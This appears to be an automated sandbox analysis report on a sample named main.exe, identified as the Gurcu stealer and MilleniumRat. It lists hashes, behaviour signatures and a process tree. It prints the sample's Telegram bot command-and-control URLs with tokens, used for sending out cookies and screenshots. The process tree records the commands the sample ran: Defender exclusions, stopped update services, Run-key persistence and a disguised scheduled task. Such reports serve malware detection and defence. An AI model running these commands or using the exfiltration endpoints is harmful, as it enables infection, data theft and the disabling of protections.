Analysis

  • max time kernel
    127s
  • max time network
    158s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    03-11-2024 17:59

General

  • Target

    main.exe

  • Size

    37.5MB

  • MD5

    8c8bb6c097891887fc0248221dd5e338

  • SHA1

    1768fda5862236c84c1f37855f09daa48406f524

  • SHA256

    562f669dd804b59934e61e07455c2fc4b5be3d7060f8ce5447244e50a444f695

  • SHA512

    11dcedf1277f573b9a0a3f426fc1df40c579a33025e957d0fe19d43cec79559c3c8aa000d8bf0e69f0ee35485ef9f675084b815c9cdfbdefd21900f6a801f770

  • SSDEEP

    786432:W8MdYj/rmTVKqB2cYrlyaBa5/X3QSPTvoIkQJh9cnE8pKNY:pjiTkrlyzX3QSPZDlcEmK+

Malware Config

Extracted

Family

gurcu

C2

https://api.telegram.org/bot7258239318:AAE_J6DhWLSRk9YOV8l1ienRdy5HsJZuR6I/sendDocument?chat_id=-1002245526003&caption=%F0%9F%93%82%20-%20Browser%20data%0A%E2%94%9C%E2%94%80%E2%94%80%20%F0%9F%93%82%20-%20cookies(0.25%20kb

https://api.telegram.org/bot7258239318:AAE_J6DhWLSRk9YOV8l1ienRdy5HsJZuR6I/sendMessage?chat_id=-1002245526003

https://api.telegram.org/bot7258239318:AAE_J6DhWLSRk9YOV8l1ienRdy5HsJZuR6I/getUpdates?offset=-

https://api.telegram.org/bot7258239318:AAE_J6DhWLSRk9YOV8l1ienRdy5HsJZuR6I/getFile?file_id=BQACAgEAAyEFAASF2AHzAALcrGcnukIBfvFWHuW0DCXy284f9uX4AAKkBAACYbA5RavLBh_1PJE9Ng

https://api.telegram.org/bot7457548429:AAGMvKYWjBbGXayEC5uoksRl1i2BIy7ylDg/sendMessage?chat_id=6024388590

https://api.telegram.org/bot7457548429:AAGMvKYWjBbGXayEC5uoksRl1i2BIy7ylDg/getUpdates?offset=-

https://api.telegram.org/bot7258239318:AAE_J6DhWLSRk9YOV8l1ienRdy5HsJZuR6I/sendDocument?chat_id=-1002245526003&caption=%F0%9F%93%B8Screenshot%20take

Signatures

  • Gurcu family
  • Gurcu, WhiteSnake

    Gurcu is a malware stealer written in C#.

  • MilleniumRat

    MilleniumRat is a remote access trojan written in C#.

  • Milleniumrat family
  • Modifies WinLogon for persistence 2 TTPs 5 IoCs
  • Process spawned unexpected child process 15 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Suspicious use of NtCreateUserProcessOtherParentProcess 12 IoCs
  • Contacts a large (2210) amount of remote hosts 1 TTPs

    This may indicate a network scan to discover remotely running services.

  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

  • Downloads MZ/PE file
  • Stops running service(s) 4 TTPs
  • Checks computer location settings 2 TTPs 10 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 18 IoCs
  • Loads dropped DLL 49 IoCs
  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Adds Run key to start application 2 TTPs 12 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 4 IoCs
  • Looks up external IP address via web service 3 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 10 IoCs
  • Enumerates processes with tasklist 1 TTPs 1 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs
  • Suspicious use of SetThreadContext 4 IoCs
  • UPX packed file 48 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Drops file in Program Files directory 3 IoCs
  • Drops file in Windows directory 1 IoCs
  • Launches sc.exe 10 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

  • Detects Pyinstaller 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 8 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Checks SCSI registry key(s) 3 TTPs 18 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 8 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 1 IoCs
  • Enumerates system info in registry 2 TTPs 1 IoCs
  • Modifies data under HKEY_USERS 60 IoCs
  • Modifies registry class 59 IoCs
  • Modifies registry key 1 TTPs 1 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 17 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of UnmapMainImage 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Windows\system32\winlogon.exe
    winlogon.exe
    1⤵
      PID:612
      • C:\Windows\system32\dwm.exe
        "dwm.exe"
        2⤵
          PID:384
      • C:\Windows\system32\lsass.exe
        C:\Windows\system32\lsass.exe
        1⤵
          PID:676
        • C:\Windows\system32\svchost.exe
          C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
          1⤵
            PID:960
          • C:\Windows\system32\svchost.exe
            C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
            1⤵
              PID:408
            • C:\Windows\System32\svchost.exe
              C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
              1⤵
                PID:924
              • C:\Windows\System32\svchost.exe
                C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
                1⤵
                  PID:1112
                • C:\Windows\system32\svchost.exe
                  C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
                  1⤵
                    PID:1132
                  • C:\Windows\system32\svchost.exe
                    C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
                    1⤵
                      PID:1160
                      • C:\Windows\system32\taskhostw.exe
                        taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}
                        2⤵
                          PID:3020
                        • C:\Program Files\Google\Chrome\updater.exe
                          "C:\Program Files\Google\Chrome\updater.exe"
                          2⤵
                          • Suspicious use of NtCreateUserProcessOtherParentProcess
                          • Executes dropped EXE
                          • Suspicious use of SetThreadContext
                          PID:1544
                      • C:\Windows\System32\svchost.exe
                        C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
                        1⤵
                          PID:1176
                        • C:\Windows\system32\svchost.exe
                          C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
                          1⤵
                            PID:1296
                          • C:\Windows\system32\svchost.exe
                            C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
                            1⤵
                              PID:1324
                            • C:\Windows\system32\svchost.exe
                              C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
                              1⤵
                                PID:1336
                              • C:\Windows\system32\svchost.exe
                                C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
                                1⤵
                                  PID:1440
                                • C:\Windows\system32\svchost.exe
                                  C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
                                  1⤵
                                    PID:1452
                                    • C:\Windows\system32\sihost.exe
                                      sihost.exe
                                      2⤵
                                        PID:2620
                                    • C:\Windows\system32\svchost.exe
                                      C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
                                      1⤵
                                        PID:1588
                                      • C:\Windows\System32\svchost.exe
                                        C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
                                        1⤵
                                          PID:1596
                                        • C:\Windows\System32\svchost.exe
                                          C:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc
                                          1⤵
                                            PID:1672
                                          • C:\Windows\system32\svchost.exe
                                            C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
                                            1⤵
                                              PID:1712
                                            • C:\Windows\System32\svchost.exe
                                              C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder
                                              1⤵
                                                PID:1740
                                              • C:\Windows\System32\svchost.exe
                                                C:\Windows\System32\svchost.exe -k LocalService -p -s netprofm
                                                1⤵
                                                  PID:1784
                                                • C:\Windows\System32\svchost.exe
                                                  C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
                                                  1⤵
                                                    PID:1828
                                                  • C:\Windows\system32\svchost.exe
                                                    C:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache
                                                    1⤵
                                                      PID:1900
                                                    • C:\Windows\System32\svchost.exe
                                                      C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
                                                      1⤵
                                                        PID:1912
                                                      • C:\Windows\System32\svchost.exe
                                                        C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection
                                                        1⤵
                                                          PID:1976
                                                        • C:\Windows\system32\svchost.exe
                                                          C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository
                                                          1⤵
                                                            PID:2004
                                                          • C:\Windows\System32\spoolsv.exe
                                                            C:\Windows\System32\spoolsv.exe
                                                            1⤵
                                                              PID:1704
                                                            • C:\Windows\System32\svchost.exe
                                                              C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation
                                                              1⤵
                                                              • Suspicious use of AdjustPrivilegeToken
                                                              PID:2184
                                                            • C:\Windows\System32\svchost.exe
                                                              C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc
                                                              1⤵
                                                                PID:2220
                                                              • C:\Windows\system32\svchost.exe
                                                                C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt
                                                                1⤵
                                                                • Suspicious use of AdjustPrivilegeToken
                                                                PID:2272
                                                              • C:\Windows\system32\svchost.exe
                                                                C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent
                                                                1⤵
                                                                  PID:2360
                                                                • C:\Windows\system32\svchost.exe
                                                                  C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT
                                                                  1⤵
                                                                    PID:2368
                                                                  • C:\Windows\system32\svchost.exe
                                                                    C:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc
                                                                    1⤵
                                                                    • Drops file in System32 directory
                                                                    PID:2544
                                                                  • C:\Windows\system32\svchost.exe
                                                                    C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer
                                                                    1⤵
                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                    PID:2572
                                                                  • C:\Windows\sysmon.exe
                                                                    C:\Windows\sysmon.exe
                                                                    1⤵
                                                                      PID:2608
                                                                    • C:\Windows\System32\svchost.exe
                                                                      C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks
                                                                      1⤵
                                                                        PID:2632
                                                                      • C:\Windows\system32\svchost.exe
                                                                        C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService
                                                                        1⤵
                                                                          PID:2656
                                                                        • C:\Windows\system32\svchost.exe
                                                                          C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
                                                                          1⤵
                                                                            PID:2744
                                                                          • C:\Windows\system32\svchost.exe
                                                                            C:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker
                                                                            1⤵
                                                                              PID:2316
                                                                            • C:\Windows\system32\wbem\unsecapp.exe
                                                                              C:\Windows\system32\wbem\unsecapp.exe -Embedding
                                                                              1⤵
                                                                                PID:704
                                                                              • C:\Windows\system32\svchost.exe
                                                                                C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc
                                                                                1⤵
                                                                                  PID:3320
                                                                                • C:\Windows\Explorer.EXE
                                                                                  C:\Windows\Explorer.EXE
                                                                                  1⤵
                                                                                  • Suspicious use of UnmapMainImage
                                                                                  PID:3360
                                                                                  • C:\Users\Admin\AppData\Local\Temp\main.exe
                                                                                    "C:\Users\Admin\AppData\Local\Temp\main.exe"
                                                                                    2⤵
                                                                                    • Suspicious use of WriteProcessMemory
                                                                                    PID:2420
                                                                                    • C:\Users\Admin\AppData\Local\Temp\main.exe
                                                                                      "C:\Users\Admin\AppData\Local\Temp\main.exe"
                                                                                      3⤵
                                                                                      • Loads dropped DLL
                                                                                      • Suspicious use of WriteProcessMemory
                                                                                      PID:228
                                                                                      • C:\Windows\system32\cmd.exe
                                                                                        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\_MEI24202\Build.exe -pbeznogym
                                                                                        4⤵
                                                                                        • Suspicious use of WriteProcessMemory
                                                                                        PID:3224
                                                                                        • C:\Users\Admin\AppData\Local\Temp\_MEI24202\Build.exe
                                                                                          C:\Users\Admin\AppData\Local\Temp\_MEI24202\Build.exe -pbeznogym
                                                                                          5⤵
                                                                                          • Checks computer location settings
                                                                                          • Executes dropped EXE
                                                                                          • System Location Discovery: System Language Discovery
                                                                                          • Suspicious use of WriteProcessMemory
                                                                                          PID:2668
                                                                                          • C:\ProgramData\Microsoft\hacn.exe
                                                                                            "C:\ProgramData\Microsoft\hacn.exe"
                                                                                            6⤵
                                                                                            • Checks computer location settings
                                                                                            • Executes dropped EXE
                                                                                            • Suspicious use of WriteProcessMemory
                                                                                            PID:4120
                                                                                            • C:\Users\Admin\AppData\Local\Temp\Build.exe
                                                                                              "C:\Users\Admin\AppData\Local\Temp\Build.exe"
                                                                                              7⤵
                                                                                              • Executes dropped EXE
                                                                                              • Suspicious use of WriteProcessMemory
                                                                                              PID:4260
                                                                                              • C:\Users\Admin\AppData\Local\Temp\Build.exe
                                                                                                "C:\Users\Admin\AppData\Local\Temp\Build.exe"
                                                                                                8⤵
                                                                                                • Executes dropped EXE
                                                                                                • Loads dropped DLL
                                                                                                • Suspicious use of WriteProcessMemory
                                                                                                PID:3440
                                                                                                • C:\Windows\system32\cmd.exe
                                                                                                  C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\_MEI42602\s.exe -pbeznogym
                                                                                                  9⤵
                                                                                                  • Suspicious use of WriteProcessMemory
                                                                                                  PID:3500
                                                                                                  • C:\Users\Admin\AppData\Local\Temp\_MEI42602\s.exe
                                                                                                    C:\Users\Admin\AppData\Local\Temp\_MEI42602\s.exe -pbeznogym
                                                                                                    10⤵
                                                                                                    • Checks computer location settings
                                                                                                    • Executes dropped EXE
                                                                                                    • System Location Discovery: System Language Discovery
                                                                                                    • Suspicious use of WriteProcessMemory
                                                                                                    PID:3164
                                                                                                    • C:\ProgramData\main.exe
                                                                                                      "C:\ProgramData\main.exe"
                                                                                                      11⤵
                                                                                                      • Checks computer location settings
                                                                                                      • Executes dropped EXE
                                                                                                      • Loads dropped DLL
                                                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                      • Suspicious use of WriteProcessMemory
                                                                                                      PID:1528
                                                                                                      • C:\Windows\System32\cmd.exe
                                                                                                        "C:\Windows\System32\cmd.exe" /C C:\Users\Admin\AppData\Local\Temp\tmpF9F0.tmp.bat & Del C:\Users\Admin\AppData\Local\Temp\tmpF9F0.tmp.bat
                                                                                                        12⤵
                                                                                                        • Suspicious use of WriteProcessMemory
                                                                                                        PID:6788
                                                                                                        • C:\Windows\system32\tasklist.exe
                                                                                                          Tasklist /fi "PID eq 1528"
                                                                                                          13⤵
                                                                                                          • Enumerates processes with tasklist
                                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                                          PID:6704
                                                                                                        • C:\Windows\system32\find.exe
                                                                                                          find ":"
                                                                                                          13⤵
                                                                                                            PID:6692
                                                                                                          • C:\Windows\system32\timeout.exe
                                                                                                            Timeout /T 1 /Nobreak
                                                                                                            13⤵
                                                                                                            • Delays execution with timeout.exe
                                                                                                            PID:6564
                                                                                                          • C:\Users\Admin\AppData\Roaming\GoogleChromeUpdateLog\Update.exe
                                                                                                            "C:\Users\Admin\AppData\Roaming\GoogleChromeUpdateLog\Update.exe"
                                                                                                            13⤵
                                                                                                            • Checks computer location settings
                                                                                                            • Executes dropped EXE
                                                                                                            • Loads dropped DLL
                                                                                                            • Checks processor information in registry
                                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                                            • Suspicious use of SetWindowsHookEx
                                                                                                            PID:6236
                                                                                                            • C:\Windows\System32\cmd.exe
                                                                                                              "C:\Windows\System32\cmd.exe" /c reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v ChromeUpdate /t REG_SZ /d C:\Users\Admin\AppData\Roaming\GoogleChromeUpdateLog\Update.exe /f
                                                                                                              14⤵
                                                                                                                PID:7128
                                                                                                                • C:\Windows\system32\reg.exe
                                                                                                                  reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v ChromeUpdate /t REG_SZ /d C:\Users\Admin\AppData\Roaming\GoogleChromeUpdateLog\Update.exe /f
                                                                                                                  15⤵
                                                                                                                  • Adds Run key to start application
                                                                                                                  • Modifies registry key
                                                                                                                  PID:7304
                                                                                                              • C:\Users\Admin\AppData\Roaming\GoogleChromeUpdateLog\svchost64.exe
                                                                                                                "C:\Users\Admin\AppData\Roaming\GoogleChromeUpdateLog\svchost64.exe"
                                                                                                                14⤵
                                                                                                                • Checks computer location settings
                                                                                                                • Executes dropped EXE
                                                                                                                • System Location Discovery: System Language Discovery
                                                                                                                • Modifies registry class
                                                                                                                PID:7908
                                                                                                                • C:\Windows\SysWOW64\WScript.exe
                                                                                                                  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\msAgentSavesmonitor\pFG3Duil1NAbFHoInFFIi7JfPHXMZXRvb98S0ewJA0VkW.vbe"
                                                                                                                  15⤵
                                                                                                                  • Checks computer location settings
                                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                                  PID:5716
                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\msAgentSavesmonitor\oGgyulsi03j6EO3sjCC.bat" "
                                                                                                                    16⤵
                                                                                                                    • System Location Discovery: System Language Discovery
                                                                                                                    PID:8448
                                                                                                                    • C:\Windows\System32\Conhost.exe
                                                                                                                      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                      17⤵
                                                                                                                      • Suspicious use of SetWindowsHookEx
                                                                                                                      PID:8468
                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe
                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\msAgentSavesmonitor/ChainComServermonitor.exe"
                                                                                                                      17⤵
                                                                                                                      • Executes dropped EXE
                                                                                                                      PID:712
                                                                                                        • C:\ProgramData\svchost.exe
                                                                                                          "C:\ProgramData\svchost.exe"
                                                                                                          11⤵
                                                                                                          • Checks computer location settings
                                                                                                          • Executes dropped EXE
                                                                                                          • System Location Discovery: System Language Discovery
                                                                                                          • Modifies registry class
                                                                                                          • Suspicious use of WriteProcessMemory
                                                                                                          PID:4992
                                                                                                          • C:\Windows\SysWOW64\WScript.exe
                                                                                                            "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\msAgentSavesmonitor\pFG3Duil1NAbFHoInFFIi7JfPHXMZXRvb98S0ewJA0VkW.vbe"
                                                                                                            12⤵
                                                                                                            • Checks computer location settings
                                                                                                            • System Location Discovery: System Language Discovery
                                                                                                            • Suspicious use of WriteProcessMemory
                                                                                                            PID:3460
                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                              C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\msAgentSavesmonitor\oGgyulsi03j6EO3sjCC.bat" "
                                                                                                              13⤵
                                                                                                              • System Location Discovery: System Language Discovery
                                                                                                              • Suspicious use of WriteProcessMemory
                                                                                                              PID:4044
                                                                                                              • C:\Users\Admin\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe
                                                                                                                "C:\Users\Admin\AppData\Local\Temp\msAgentSavesmonitor/ChainComServermonitor.exe"
                                                                                                                14⤵
                                                                                                                • Modifies WinLogon for persistence
                                                                                                                • Checks computer location settings
                                                                                                                • Executes dropped EXE
                                                                                                                • Adds Run key to start application
                                                                                                                • Drops file in Program Files directory
                                                                                                                • Modifies registry class
                                                                                                                • Suspicious behavior: EnumeratesProcesses
                                                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                                                • Suspicious use of WriteProcessMemory
                                                                                                                PID:1688
                                                                                                                • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                                                  "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\uixrdt5w\uixrdt5w.cmdline"
                                                                                                                  15⤵
                                                                                                                  • Suspicious use of WriteProcessMemory
                                                                                                                  PID:6848
                                                                                                                  • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                                                                    C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESFA5E.tmp" "c:\ProgramData\CSC684B451FD2984634898D6CED472DB9.TMP"
                                                                                                                    16⤵
                                                                                                                      PID:6736
                                                                                                                  • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                                                    "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\wyqxeqfq\wyqxeqfq.cmdline"
                                                                                                                    15⤵
                                                                                                                    • Drops file in System32 directory
                                                                                                                    • Suspicious use of WriteProcessMemory
                                                                                                                    PID:6672
                                                                                                                    • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                                                                      C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESFAFA.tmp" "c:\Windows\System32\CSCED3E03C6DAF24A8B8E6EECFD7BE0E2AB.TMP"
                                                                                                                      16⤵
                                                                                                                        PID:6584
                                                                                                                    • C:\Windows\System32\cmd.exe
                                                                                                                      "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\Tn4MG1Mxwr.bat"
                                                                                                                      15⤵
                                                                                                                      • Suspicious use of WriteProcessMemory
                                                                                                                      PID:6136
                                                                                                                      • C:\Windows\system32\chcp.com
                                                                                                                        chcp 65001
                                                                                                                        16⤵
                                                                                                                          PID:6192
                                                                                                                        • C:\Windows\system32\w32tm.exe
                                                                                                                          w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                                                                                                                          16⤵
                                                                                                                            PID:6216
                                                                                                                          • C:\Users\Default\Videos\dllhost.exe
                                                                                                                            "C:\Users\Default\Videos\dllhost.exe"
                                                                                                                            16⤵
                                                                                                                            • Executes dropped EXE
                                                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                                                            PID:5564
                                                                                                                • C:\ProgramData\crss.exe
                                                                                                                  "C:\ProgramData\crss.exe"
                                                                                                                  11⤵
                                                                                                                  • Executes dropped EXE
                                                                                                                  • Suspicious use of WriteProcessMemory
                                                                                                                  PID:4316
                                                                                                                  • C:\ProgramData\crss.exe
                                                                                                                    "C:\ProgramData\crss.exe"
                                                                                                                    12⤵
                                                                                                                    • Executes dropped EXE
                                                                                                                    • Loads dropped DLL
                                                                                                                    • Adds Run key to start application
                                                                                                                    • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                                    • Suspicious use of WriteProcessMemory
                                                                                                                    PID:1476
                                                                                                                    • C:\Windows\system32\cmd.exe
                                                                                                                      C:\Windows\system32\cmd.exe /c "ver"
                                                                                                                      13⤵
                                                                                                                        PID:4568
                                                                                                                  • C:\ProgramData\setup.exe
                                                                                                                    "C:\ProgramData\setup.exe"
                                                                                                                    11⤵
                                                                                                                    • Suspicious use of NtCreateUserProcessOtherParentProcess
                                                                                                                    • Executes dropped EXE
                                                                                                                    • Suspicious use of SetThreadContext
                                                                                                                    • Drops file in Program Files directory
                                                                                                                    PID:2924
                                                                                                        • C:\ProgramData\Microsoft\based.exe
                                                                                                          "C:\ProgramData\Microsoft\based.exe"
                                                                                                          6⤵
                                                                                                          • Executes dropped EXE
                                                                                                          • Suspicious use of WriteProcessMemory
                                                                                                          PID:4216
                                                                                                          • C:\ProgramData\Microsoft\based.exe
                                                                                                            "C:\ProgramData\Microsoft\based.exe"
                                                                                                            7⤵
                                                                                                            • Executes dropped EXE
                                                                                                            • Loads dropped DLL
                                                                                                            PID:2920
                                                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
                                                                                                  2⤵
                                                                                                  • Command and Scripting Interpreter: PowerShell
                                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                                  PID:7572
                                                                                                • C:\Windows\System32\cmd.exe
                                                                                                  C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc
                                                                                                  2⤵
                                                                                                    PID:7736
                                                                                                    • C:\Windows\System32\sc.exe
                                                                                                      sc stop UsoSvc
                                                                                                      3⤵
                                                                                                      • Launches sc.exe
                                                                                                      PID:7784
                                                                                                    • C:\Windows\System32\sc.exe
                                                                                                      sc stop WaaSMedicSvc
                                                                                                      3⤵
                                                                                                      • Launches sc.exe
                                                                                                      PID:7800
                                                                                                    • C:\Windows\System32\sc.exe
                                                                                                      sc stop wuauserv
                                                                                                      3⤵
                                                                                                      • Launches sc.exe
                                                                                                      PID:7820
                                                                                                    • C:\Windows\System32\sc.exe
                                                                                                      sc stop bits
                                                                                                      3⤵
                                                                                                      • Launches sc.exe
                                                                                                      PID:7852
                                                                                                    • C:\Windows\System32\sc.exe
                                                                                                      sc stop dosvc
                                                                                                      3⤵
                                                                                                      • Launches sc.exe
                                                                                                      PID:7868
                                                                                                  • C:\Windows\System32\dialer.exe
                                                                                                    C:\Windows\System32\dialer.exe
                                                                                                    2⤵
                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                    PID:7900
                                                                                                  • C:\Windows\System32\schtasks.exe
                                                                                                    C:\Windows\System32\schtasks.exe /delete /f /tn "GoogleUpdateTaskMachineQC"
                                                                                                    2⤵
                                                                                                      PID:7908
                                                                                                    • C:\Windows\System32\schtasks.exe
                                                                                                      C:\Windows\System32\schtasks.exe /create /f /ru "System" /tn "GoogleUpdateTaskMachineQC" /xml "C:\Users\Admin\AppData\Local\Temp\yntnomxcupkb.xml"
                                                                                                      2⤵
                                                                                                      • Scheduled Task/Job: Scheduled Task
                                                                                                      PID:7984
                                                                                                    • C:\Windows\System32\schtasks.exe
                                                                                                      C:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"
                                                                                                      2⤵
                                                                                                        PID:4952
                                                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
                                                                                                        2⤵
                                                                                                        • Command and Scripting Interpreter: PowerShell
                                                                                                        • Drops file in System32 directory
                                                                                                        • Modifies data under HKEY_USERS
                                                                                                        PID:5796
                                                                                                        • C:\Windows\System32\Conhost.exe
                                                                                                          \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                          3⤵
                                                                                                            PID:5844
                                                                                                        • C:\Windows\System32\cmd.exe
                                                                                                          C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc
                                                                                                          2⤵
                                                                                                            PID:7244
                                                                                                            • C:\Windows\System32\Conhost.exe
                                                                                                              \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                              3⤵
                                                                                                                PID:7312
                                                                                                              • C:\Windows\System32\sc.exe
                                                                                                                sc stop UsoSvc
                                                                                                                3⤵
                                                                                                                • Launches sc.exe
                                                                                                                PID:7332
                                                                                                              • C:\Windows\System32\sc.exe
                                                                                                                sc stop WaaSMedicSvc
                                                                                                                3⤵
                                                                                                                • Launches sc.exe
                                                                                                                PID:7420
                                                                                                              • C:\Windows\System32\sc.exe
                                                                                                                sc stop wuauserv
                                                                                                                3⤵
                                                                                                                • Launches sc.exe
                                                                                                                PID:7104
                                                                                                              • C:\Windows\System32\sc.exe
                                                                                                                sc stop bits
                                                                                                                3⤵
                                                                                                                • Launches sc.exe
                                                                                                                PID:7264
                                                                                                              • C:\Windows\System32\sc.exe
                                                                                                                sc stop dosvc
                                                                                                                3⤵
                                                                                                                • Launches sc.exe
                                                                                                                PID:7584
                                                                                                            • C:\Windows\System32\dialer.exe
                                                                                                              C:\Windows\System32\dialer.exe
                                                                                                              2⤵
                                                                                                                PID:7644
                                                                                                              • C:\Windows\System32\schtasks.exe
                                                                                                                C:\Windows\System32\schtasks.exe /create /f /ru "System" /tn "GoogleUpdateTaskMachineQC" /xml "C:\Windows\TEMP\yntnomxcupkb.xml"
                                                                                                                2⤵
                                                                                                                • Scheduled Task/Job: Scheduled Task
                                                                                                                PID:7728
                                                                                                                • C:\Windows\System32\Conhost.exe
